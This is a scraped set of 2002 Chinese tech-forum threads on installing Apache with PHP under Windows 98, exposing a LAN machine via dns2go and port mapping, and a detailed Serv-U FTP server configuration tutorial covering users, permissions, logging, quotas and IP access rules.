我是一条美人鱼，游啊游啊游~~~~~~~
上一贴 | 下一贴
快速回复 主题：紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请教大虾们 - 经 典 论 坛

计算机技术
请教大虾们

上一贴 | 下一贴
发表人 主题: 请教大虾们
蓝影

初级用户
积分：48
发帖：13
来自：珠海广东中国
注册：2001-12-24
 发表于 2002-01-17 08:18:11 按此观看蓝影的个人资料 按此发邮件给蓝影 收藏该主题供以后查看 发送悄悄话给蓝影 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝影的IP
win98下能不能安装并使用apache？如果能装的话要注意什么？

沉指江山，默划乾坤。
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-17 10:10:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引用:

    下载Apache for win32,下载后的文件解压，到一个目录，运行Setup程序，会提示整个安装的过程。比如安装到一个目录（c:apache）下。然后，在该目录的字目录conf下有一个名为httpd.conf的文本文件，用文本编辑器编辑它，将“#BindAddress *”这一行改为“BindAddress 127.0.0.1”（如果在局域上可以设定为你的本机IP）.好了，就是如此简单，开始运行Apache吧，接着你在浏览器中输入：http://127.0.0.1应该就会看到Apache服务器的效果了。需要说明的是，如果你的本机已经在运行一个其它的Web服务器了，你可以通过修改端口来区别开来，你可以在httpd.conf文件的“Port 80”改为“Port 81”或其它没有运行服务的端口。一般来说，FTP端口为21... ，那么，你在浏览器中输入“http://127.0.0.1:81”就可以了（注意：单机用户必须把#ServerName new.host.name前的#号也去掉，否则可能安装失败）。

    编辑httpd.conf文件（注意：该文件一般不要轻易改动）,在该文件中加一行
Alias /test/ "c:/php3/test/" 表示将c:/php3/test/目录设置为虚拟目录/test/(目录名可任定),那么你在c:/php3/test/下的文件，就可以通过在浏览器中输入“http://127.0.0.1/test/文件”访问。
在httpd.conf文件中加入以下几行：
ScriptAlias /php3/ "c:/php3/"
AddType application/x-httpd-php3 .php
Action application/x-httpd-php3 "/php3/php.exe"

使其可以支持PHP.

在开始菜单中打开或关闭Apache,在test目录下编写一个最简单的PHP程序:

<?
echo "Ok!";
?>

在浏览器中(http://127.0.0.1/test/hello.php)看看有没有成功？

引自：PHP——PHP + MySQL + Apache 在WIN98下安装的体会和注意点

引用:

    安装APACHE1.3.12

软件获得:http://www.apache.org;http://www.phpchina.com;http://phpuser.com;http://www.phpsite.net。

软件的安装很简单,下载完后直接双击执行安装.

配置conf目录下的httpd.conf文件.
#BindAddress *改为 BindAddress 127.0.0.1
#Servername new.host.name改为Servername localhost

出现类似的错误的原因可能就是没有指定servername.
"cannot determine local host name,use servername to set it manually"

好了，你的apache已经可以运行了!
运行你的apache.应该显示：

Apache/1.3.12 (Win32) running...
注意,这里假设您的APACHE是安装在默认目录下即:
C:/Program Files/Apache Group/Apache
否则文档中的serverroot以及docmentroot等也要更改。比如你是安装在c:\apache下.那么
serverroot = c:/apache docmentroot = c:/apache/htdocs
其他选项依次类推

如果你的机器还安装了别的服务器程序,而你又希望他们共同为你效劳那么你就必须改一下port ,默认为80,你可以改为81或者8080.不要使用其他一些常用的端口比如21,23, 25等(废话^_^).

好了，下面让你的APACHE来支持PHP4. 加上下面这么几句,基本上就可以了!

    ScriptAlias /php4/ "C:/php4/"
    AddType application/x-httpd-php4 .php
    AddType application/x-httpd-php4 .php3
    AddType application/x-httpd-php4 .php4
    Action application/x-httpd-php4 "/php4/php.exe"

;不要写成
;Action application/x-httpd-php4 "c:/php4/php.exe"
;否则会出错的.

在httpd.conf中分别找到相似的行,加进去,这样容易维护一些. 关于默认启动文档:apache的默认启动文档为index.html DirectoryIndex index.html 把它改为你想要的默认启动文档
想要支持更多文档要象这样:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4

完成了! 写一个测试文件:

    <?
        phpinfo();
    ?>
保存为info.php

在浏览器中输入http://localhost/info.php
别忘了要先运行APACHE啊！

引自：Windows 98下安装Apache(PWS) PHP4 MySQL phpMyAdmin的方法

[这消息被啸编辑过(编辑时间2002-01-17 10:14:22)]

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：请教大虾们
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


局域网用户使用dns2go的做法 - 经 典 论 坛

计算机技术
局域网用户使用dns2go的做法

上一贴 | 下一贴
发表人 主题: 局域网用户使用dns2go的做法
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-01-25 15:24:06 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 收藏该主题供以后查看 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
首先当然要安装d2g client了，你可以到它的官方网站下载到
http://www.deerfield.com/download/dns2go/

下载后你可以把它安装在你的局域网服务器或者客户机上都可以。
一路回车安装完后，按提示，注册一个新的域名：

注册好后，如果一切正常，你的d2g客户端便已经工作了。

但是，现在的d2g只能映射你局域网服务器的IP，外部并不能访问你的机器。
现在你需要一个端口映射软件。

推荐一个小巧实用的工具: portTunnel

http://nj.onlinedown.net/PORTTUNNEL.HTM

下载后无需要安装，解压后直接在服务器上运行即可。
运行后，点击"Add"，添加一个监听规则，如下图:

这里，Port In是要监听的端口，port out是要映射的端口。比如你想监听服务器的88端口，映射到你的机器的80端口，这里的port in便是88，port out便是80。默认的FTP端口是21，如果想开FTP服务器，这里可以是21。
添加后，点"start"，服务器开始。程序自动加入系统服务，每次开机便会自动启动。

好了，现在可以用你申请的 d2g域名:监听端口 来访问你的机器了。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 主题：局域网用户使用dns2go的做法
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


FTP个人服务器 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
FTP个人服务器

上一贴 | 下一贴
发表人 主题: FTP个人服务器
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 18:51:25 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 收藏该主题供以后查看 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
请问那有FTP个人服务器的架设的教材？请给我说说。麻烦大家了。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 18:54:56 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
先到DG2GO申请一个帐号
然后和申请空间一样的，呵呵
之后有一个客户端软件提供给你，你把自己的帐号填入，把喜欢的域名填入，设置好人数，设置好相应的下载速度一般就可以了

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 18:57:08 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
Internet 的迅速发展为人们提供的前所未有的信息资源，越来越多的人希望在享受Internet 带来的全新的体验的时候，能够拥有自己的网上家园。在当今流行的Internet 应用中，要数WWW 和 FTP 文件传输最为普及了。本文将结合Serv-U 这一功能强大，界面友好，易学易用的FTP 服务器端软件，详细的介绍如何在最短的时间内建立起一个完备的FTP 服务器。除了具体的安装和配置说明外，文中还将涉及一些使用FTP 所必须了解的相关知识，希望能够对广大网友有所帮助。

简介

    Serv-U 是目前众多的FTP 服务器软件之一。通过使用Serv-U，用户能够将任何一台PC 设置成一个FTP 服务器，这样，用户或其他使用者就能够使用FTP 协议，通过在同一网络上的任何一台PC与FTP 服务器连接，进行文件或目录的复制，移动，创建，和删除等。这里提到的FTP 协议是专门被用来规定计算机之间进行文件传输的标准和规则，正是因为有了象FTP 这样的专门协议，才使得人们能够通过不同类型的计算机，使用不同类型的操作系统，对不同类型的文件进行相互传递。

    虽然目前FTP 服务器端的软件种类繁多，相互之间各有优势，但是Serv-U 凭借其独特的功能得以展露头脚。具体来说，Serv-U 能够提供以下功能：
符合windows 标准的用户界面友好亲切，易于掌握。

支持实时的多用户连接，支持匿名用户的访问；通过限制同一时间最大的用户访问人数确保PC 的正常运转。

安全性能出众。在目录和文件层次都可以设置安全防范措施。能够为不同用户提供不同设置，支持分组管理数量众多的用户。可以基于IP 对用户授予或拒绝访问权限。

支持文件上传和下载过程中的断点续传。

支持拥有多个IP 地址的多宿主站点。

能够设置上传和下载的比率，硬盘空间配额，网络使用带宽等，从而能够保证用户有限的资源不被大量的FTP 访问用户所消耗。

可作为系统服务后台运行。

可自用设置在用户登录或退出时的显示信息，支持具有UNIX 风格的外部链接。

    上面列出的只是Serv-U 众多功能中的一部分，具体的使用将在下文中进行详细的介绍，这里要说明的? 时，Serv-U 在保持功能全面，强大的基础上，提供的完全易于使用的操作界面，可以说一切尽在掌握。
使用说明

    用户在使用Serv-U 的过程中可能会碰到的所有设置问题都可以通过Serv-U 窗口中的菜单选项实现。如果用户在安装Serv-U 之后，启动Serv-U 时，屏幕上没有显示出Serv-U 的控制窗口的话，可以用鼠标右键点击位于任务条系统托盘中的Serv-U 图标（一个大写的字母“U”），然后选择弹出菜单中的第一项“Show Window”，这样屏幕上就会显示出Serv-U 的控制窗口。

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 18:58:14 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
设置FTP服务器

    位于Serv-U 控制窗口中的“SETUP”菜单中的第一项“FTP-SERVER”用来对FTP 服务器进行总体上的设置。在选择之后出现的窗口中的第一项“FTP PORT NUMBER”用来设置FTP服务器使用的端口号，FTP服务器将会通过该端口收听所有来访用户的信息。一般情况下，FTP 服务器的默认端口号为21，但是用户可以根据自己的情况自由的进行更改，只要能够保证所采用的端口号与其它网络应用不冲突即可。这里需要说明的一点是，使用用户自己选择的服务器端口可以起到很好的安全防范作用，这时，只有用户自己和其他知道该端口号的用户才能够成功的实现与服务器的连接。因此，建议用户在设置FTP 服务器的时候使用自己选定的端口，而不要只是简单的使用默认值。

    随后用户需要设置服务器所能提供的最大速度。一般情况下，用户可以将这项空出，那么服务器将会利用所有可能的带宽为客户提供服务。能够为用户提供最大的访问速度当然很好，但是过多的FTP 用户可能会蚕食掉一切可能的带宽，从而使其它的网络应用几乎不可能实现。因此，合理的控制FTP 服务器所能够占用的最大带宽还是很重要的。

    下一项是设置服务器允许的最大用户访问量。在此，用户可以限制同一时间内访问FTP 服务器的最大人数。如果把该项设为0，那么FTP 服务器将会拒绝任何用户访问要求；如果将该项空出，那么Serv-U 将不会对访问人数进行控制，直到耗尽所有的系统资源。如果用户希望自己的FTP 服务器能够保持正常运转的话，那么最好对来访的用户数量进行合理的限制。一般情况下，即使老式的486 机器，在使用Serv-U之后，也能够在同一时间内为20多名用户提供访问支持。

    在此之后的一系列复选项中的第一项为“启动安全功能”。如果用户没有选择该项，那么任何人通过网络都可以直接进入FTP 服务器，对服务器中的任何文件进行随意地复制，改动，甚至删除。除了那些拥有小范围内的个人网络，不希望每次登录都重复输入用户名、密码等烦杂手续的人之外，用户一定要确保已经选中了该选项，即启动了服务器的安全防范功能。

    下一项“ENCRYPT PASSWORDS”在默认情况下也被自动选中。这样，Serv-U 将会使用与UNIX 操作系统相同的加密机制加密并保存用户的密码。如果用户不选择对密码进行加密，那么所有用户输入的口令将会以明文的方式保存在位于Serv-U 安装目录下的Serv-U.ini 文件中。

    随后一项用来设定是否需要匿名访问用户输入密码。默认情况下，该项为空白，这样那些使用匿名帐号访问FTP 服务器的用户将不被要求输入口令。需要注意的是这里对匿名用户密码的检测非常简单，只要匿名用户输入符合邮件地址格式的任意字符串即可，Serv-U 不会进一步的判断用户输入的邮件地址是否真正存在。

    下一项为预防反超时措施。如果用户选择了该选项，Serv-U 将会采用新的记时方式，那些希望通过定期向服务器发送命令来防止出现超时操作的用户将不再得逞。

    随后的选项被用来设定是否删除没有完整上传的文件，如果用户不使用该删除功能，那么当有用户在向FTP 服务器上传文件的过程中出现错误而没有实现文件的完整上传时，Serv-U 将会在硬盘上保留已上传的内容，从而实现上传文件的断点续传。

    下面我们要讨论的是跨FTP 攻击。通常状况下，当使用FTP 协议进行文件的传输时，客户端首先向FTP 服务器发出一个“PORT”命令，该命令中包含该用户的IP地址和将被用来进行数据传输的端口号。服务器在收到该命令后，利用命令所提供的用户地址信息建立与用户的连接。大多数情况下，上述过程不会出现任何问题，但是，当客户端是一名恶意用户时，可能会通过在PORT 命令中加入特定的地址信息，使FTP 服务器与其它非客户端的机器建立连接。虽然这名恶意用户可能本身无权直接访问某一特定机器，但是如果FTP 服务器有权访问该机器的话，那么恶意用户通过FTP 服务器作为中介，仍然能够最终实现与目标服务器的连接。这就是我们所提到的跨服务器攻击。为了防止上述情况的发生，用户可以选择“防止跨FTP 服务器攻击”的选项，这样Serv-U在与任何来访用户建立连接之前，首先要核实该用户提供的地址信息是否为其真实地址。任何事情都是两方面的。我们已经知道通过使用Serv-U 可以防止发生跨FTP服务器的攻击，但是，同时我们也放弃了在FTP服务器和FTP 服务器之间实现数据传输的功能。这是因为Serv-U 只会与那些所提供的地址与地址提供者的实际地址相符的用户建立连接，用户将不能远程控制在两台不同的FTP 服务器之间进行文件传输。

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 18:58:46 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
最后的两个选项用来限制用户在FTP 服务器上的最大停留时间，以及规定服务器中文件和目录名的大小写。

    该窗口中的其它相关选项我们将会在稍后进行详细介绍。

用户帐号管理

    用户使用FTP 服务器的一个最基本的任务就是添加和管理用户信息。通过选择“SETUP”菜单中的“USERS”打开Serv-U 的用户管理窗口。该窗口可以分为左右两大部分。其中左边的窗口用来显示目前所有已经注册的FTP服务器的用户。任意选中其中一个用户，其详细的配置信息将会相应的显示在窗口的右边。如果是首次启动Serv-U，那么仅会显示一个名为“DEFAULT”的系统默认帐号。
    下面详细介绍一下建立新用户帐号的全过程．

    首先单击窗口最右边的“NEW”按钮，在随后的弹出窗口中输入需要建立的用户名。这时，输入的用户名就会出现在窗口右边的用户名一栏中。用户还可以在该栏中对所建立的帐号名称进行修改。

    随后用户可以输入该帐号将要归属的用户组的组名或建立一个新的组。所谓组是人们为了便于管理数量庞大的用户群而推出的概念。我们可以把众多的单个用户划分到不同的组里进行统一的管理。因为属于同一个组的用户都具有一些共同的属性，例如用户密码，根目录等，所以用户只需要对个别具有特殊属性的帐号进行个别设置即可，这样就极大的简化了对用户帐号的管理和维护工作。需要注意的一点是，“Anonymous”这个特殊的用户帐号不属于任何一个用户组。

    在随后的密码栏中需要输入帐号的口令，如果用户在服务器的设置中选择了加密密码的选项（见前文），那么所输入的密码将自动以加密方式储存。关于密码很重要的一点是只有输入的前8位字符有效，希望能够引起广大Serv-U 使用者的注意。另外，如果用户在建立新的帐号时没有输入相应的密码，那么并不意味着该用户帐号没有密码，Serv-U 将会尝试着寻找是否该用户帐号属于某一个用户组并且该用户组具有统一的密码。如果Serv-U 没有找到相应的用户组密码的话，将会拒绝该用户帐号的访问。如果用户确实希望不规定某个帐号的密码，只要在相应帐号的密码一栏中输入“$#@60;$#@60;None$#@62;$#@62;”即可。上述情况的一个例外是Anonymous 用户帐号，该帐号没有密码，Serv-U 只要求用户输入符合邮件地址格式的任意字符串即可。

    在“HOME”一栏中，设置FTP 用户的根目录，即用户在成功登录之后所自动位于的起始目录。每一个用户帐号都要有自己的根目录，否则Serv-U 将拒绝该用户帐号的访问。当然，如果该帐号属于某个组，而该用户组已经设定了共同的根目录，那么用户就不必对该用户组内的每个帐号进行重复设置。用户在输入根目录的地址时应当注意必须使用完全路径，包括盘符。
    在“NOTE”一栏中，用户可以选择输入一些对帐号起辅助说明的文字以备将来参考之用。

    在用户窗口右边最大的一栏用来设定帐号的访问权限，从而决定用户可以访问哪些文件，并以何种方式访问这些。Serv-U 按照文件和目录两大类别对用户的访问权限进行了划分。具体来说包括：

对文件的访问权限：

READ：允许用户下载文件；

WRITE：允许用户上传文件，但无权对文件进行更改，删除，或重命名；

APPEND：允许用户对已有的文件进行附加，拥有APPEND权限的用户自动拥有WRITE

权限；

DELETE：允许用户对文件进行改动，重命名，或删除。拥有DELETE权限的用户自动拥

有WRITE 和APPEND 权限；

EXECUTE：允许用户通过FTP 运行可执行文件。例如，用户可以远程运行DOS或Windows

程序。

对目录的访问权限：

LIST：允许用户取得目录列表；

MAKE：允许用户在根目录下建立新的子目录；

REMOVE：允许用户删除根目录下的子目录。

INHERIT：选中该选项之后，对某一目录设置的访问权限将自动被该目录下的所有子目录

继承。

在完成上述所有设置之后，点击“STORE”按钮，新建立的用户帐号将被保存在FTP 服务器中。

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-01-24 18:58:47 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
有点怀念当时在学校里开FTP的时候了，速度又快，几乎有电脑的都FTP了，可惜外面访问不了。:-((

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 18:59:44 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
blockquote>
实时监控

    用户在完成FTP服务器的基本配置之后，就可以向外界提供FTP文件传输服务了。我想很多用户都希望在提供FTP 服务的过程中，能够实时地对访问自己服务器的用户进行监控，从而一方面既能够对整个服务过程做到心中有数，另一方面还可以在可能出现意外问题之前，采取及时的防范和补救措施。在这一方面，相信Serv-U 能够充分满足大家的需求。
    首先，让我们看一下如何利用Serv-U 实现实时的用户监控。

    选择“FILE”菜单中的“USER INFO”选项。在弹出窗口中的上半部分将会显示出所有当前正在与服务器连接的用户。用鼠标点击其中的任一用户将会在窗口的下半部分出现该用户的详细信息。

    在窗口的右下方有一个“SPY ON USER”按钮，点击之后出现的窗口将会显示出特定用户向FTP服务器发出以及FTP 服务器响应的所有命令。该窗口将会跟踪所选用户的所有命令，对了解特定用户在访问FTP 服务器的过程中的所有行为提供了可靠的依据。

    在该按钮下方还有一个名为“KILL USER”的按钮，如果用户发现某个来访用户的行为可疑，可能会对FTP 服务器的正常工作带来危害的话，可以通过使用该按钮立即中断与该用户的连接，将该用户踢出FTP 服务器。

    需要注意的一点是，虽然Serv-U 能够提供实时的用户监控信息，但是需要耗用很大一部分的系统资源。如果用户发现系统性能出现明显下降的话，可以通过窗口右侧的“FREEZE LIST”按钮暂时冻结窗口信息的动态显示，从而释放出宝贵的系统资源。
设置服务器端日志记录

    除了能够实时的进行监控之外，Serv-U还提供了强大的日志记录功能，从而方便用户记录和总结一段时期内Serv-U的运行情况。

    选择“FILE”菜单下的“LOGGING”，弹出日志设置窗口，用户可以选择对哪些事件进行记录，以及将记录信息保存到何处。

    在该窗口的右侧，用户可以选择对不同的事件进行记录，其中包括系统信息，安全信息等，同时用户还可以设置是将所记录 畔⑾允驹赟erv-U 的主窗口内，还是保存到某一指定文件内。出于耗用系统资源和备份信息的需要，建议用户把日志信息保存到指定的文件内。
需要说明的一点是Serv-U 的日志记录文件采用统一的格式，具体如下：

[n] DATE TIME - (xxxx) MESSAGE

最前面的数字“n”代表所记录信息的类别，分别为：

n=1：系统信息（错误信息等）；

n=2：用户发出的FTP 命令；

n=3：文件下载；

n=4：文件上传；

n=5：安全信息（用户登录信息等）

n=6：服务器响应的FTP 命令；

n=7：WinSock使用记录；

n=8：DLL文件访问记录

另外，括号中的“XXXX”是Serv-U 赋予每一个来访用户的一个唯一的数字标识。

5．设置登录和退出信息

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 19:00:42 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
细心的用户可能会发现在登录或退出某个FTP站点时，经常会出现一个窗口，显示一些包括系统设置，欢迎访问等在内的信息。那么如何在Serv-U 下实现这一功能呢？

    首先，用户需要把要显示给用户的信息保存在一个文本文件中，然后选择“SETUP”菜单中的“MESSAGES”，在弹出的窗口中进行设置。

    在位于窗口最上方的下来框中，用户需要选择将要使用登录和退出信息的IP地址。因为Serv-U 支持一台机器拥有多个IP，所以用户需要选择相应的IP地址。在下面的两个选项中分别输入用户事先已经建立好的包含登录和退出信息的文本文件的地址。
使用外部连接

    所谓外部连接是指那些显示在某一目录下指向位于该目录之外的某一文件或目录的连接。在用户端看来，外部连接所指向的文件或目录就位于当前目录之下，但实际上他们只是一些起连接作用的虚拟指针。使用外部连接的一个最大好处就是能够把来访用户可能需要的所有资源都集中到一个目录之中，这样用户就可以通过不同的外部连接访问实际上位于不同磁盘或不同目录的分散信息。
    为了充分利用Serv-U 提供的外部连接功能，用户首先需要生成一个文本文件保存所有可能会用到的外部连接。文件的具体格式如下：

LINK NAME | SOURCENAME

    其中的“LINK NAME”是显示在用户当前目录下的外部连接的名称，而“SOURCENAME”则是该外部连接实际指向的磁盘或目录。

    例如我们在一个名为“LINK.TXT”的文件中写入如下一条：

CD-ROM | F：\

    这样在用户的当前目录中就会出现“CD-ROM”字样，点击之后，就可以直接访问FTP 服务器的光驱。

    在配置好外部连接的文本文件之后，选择“FTLE”菜单中的“FTP SERVER”，在弹出的窗口中找到“PRIMARY FIEL CONTAINING LINK”，然后输入上述文本文件的完全路径。在“PRIMARY FIEL CONTAINING LINK”下方有一个“SECONDARY FILE CONTAINING LINK”，该项是用来设定起辅助作用的外部连接文件，可以参照上述方法生成。
设置上传和下载比例

    如果用户希望自己FTP 站点的使用者不仅仅使用自己提供的资源，还能够上传一些有价值的东西供大家共享的话，可以通过使用Serv-U提供的“上传和下载比例”这一功能实现。

    用户可以在“FILE”菜单中的“FTP-SERVER”，“USERS”和“GROUPS”的弹出窗口中找到名为“U/D RATIOS”的功能按钮，点击之后出现设置窗口。用户可以限制每个FTP 站点的使用者每上传一个文件后可以下载的文件数。例如，如果将某个用户的上传和下载比例设置为1/3，那么该用户每上传一个文件，就可以从FTP 站点下载3个文件。
    Serv-U 支持在单个会话过程或全部会话过程的范围内，按照具体传输的文件数目或文件的大小，限制用户的上传和下载比例。

使用磁盘限额

    随着用户数量的增加，一个非常实际的问题就是如何既能够确保每个用户都有足够的硬盘空间可用，同时又防止FTP 服务器吞食整个机器的硬盘资源。同样，在这个问题上Serv-U提供了有力的解决方案。

    用户可以分别在“FILE”菜单中的“USERS”和“GROUPS”选项的弹出窗口中找到名为“QUATO”的功能按钮。点击之后出现设置窗口，用户可以首先检测某个用户帐号当前所使用的硬盘空间，然后根据具体的情况分别设置不同的用户帐号所能支配的最大硬盘空间，从而有效的解决硬盘空间不足的问题。
基于IP地址授予或拒绝访问权限

    选择“FILE”菜单中的“IP ACCESS”选项，在弹出的窗口中进行设置。

    用户可以在窗口的左边设置不同的访问规则，而当前所有的访问规则将会显示在右边的列表中。

    Serv-U 提供了两种基本的访问规则，分别为“拒绝访问”规则和“允许访问”规则。在“拒绝访问”规则下，所有来自用户输入的IP地址的访问者都将被拒绝访问，而来自其它IP地址的用户都将被授予访问权限。同理，如果用户选择了“允许访问”规则，那么所有来自用户输入的IP地址的访问者都将被授予访问权限，而来自其它IP 地址的用户将无权访问FTP 服务器。
    通过以上功能，用户可以针对不同的IP地址，设置不同的权限，从而有效的保障FTP 服务器免受非法访问者的侵害。

三．小节

    Serv-U 是一款使用简单，功能强大，易学易用的FTP 服务器端软件。相信广大用户结合以上的介绍，再加上个人的实践，一定会在最短的时间内构建起自己的功能强大的FTP服务器。

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 19:06:15 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
到那能下载去，最好带注册码的。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-01-24 19:14:21 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
其实我不想依靠什么软件来假设FTP服务器。我想通过系统自带的IIS或PWS来完成。不知道能否架设。请指教。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-24 19:14:56 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
请不要谈论这类敏感问题
SERV_U不是免费软件
但是有试用版本
其他你自己想办法吧

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
